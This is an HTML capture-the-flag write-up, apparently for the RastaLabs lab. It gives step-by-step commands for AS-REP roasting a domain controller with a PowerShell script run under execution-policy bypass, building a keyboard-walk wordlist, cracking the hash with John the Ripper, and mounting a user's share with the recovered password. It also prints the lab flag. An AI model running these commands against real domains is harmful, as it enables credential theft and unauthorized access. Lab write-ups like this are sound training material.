<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>4 flag</title>
</head><body>for privilege escalation found the host is vulnerable to asrep roasting,<br/>
<br/>
source - https://github.com/HarmJ0y/ASREPRoast<br/>
Reference - https://blog.xpnsec.com/kerberos-attacks-part-2/<br/>
<br/>
upload the script and execute<br/>
<br/>
powershell -ep bypass<br/>
Import-module ./asreproast.ps1<br/>
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1<br/>
Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 | select -expand hash<br/>
<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
<br/>
copy the hash to a txt file and save it with utf-8 encoding [ bcoz john use utf-8 ] <br/>
<br/>
create a wordlist file using tool kwprocessor, <br/>
reference - &nbsp;https://cyberarms.wordpress.com/2018/02/13/creating-hashcat-keymap-walking-password-wordlists/<br/>
<br/>
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route &gt; kwp3.txt<br/>
<br/>
<br/>
use john magnumripper [jumbo version] , https://github.com/magnumripper/JohnTheRipper<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
username - ngodfrey<br/>
password - &nbsp;zaq123$%^&amp;*()_+<br/>
<br/>
<img src="screenshot 5.png" /><br/>
<br/>
enumerate the user ngodfrey,<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
mount the home directory,<br/>
<br/>
net use H: \\fs01.rastalabs.local\home$\ngodfrey /user:ngodfrey "zaq123$%^&amp;*()_+"<br/>
<br/>
<img src="screenshot 4.png" /><br/>
<br/>
RASTA{k3rb3r05_15_7r1cky}</body></html>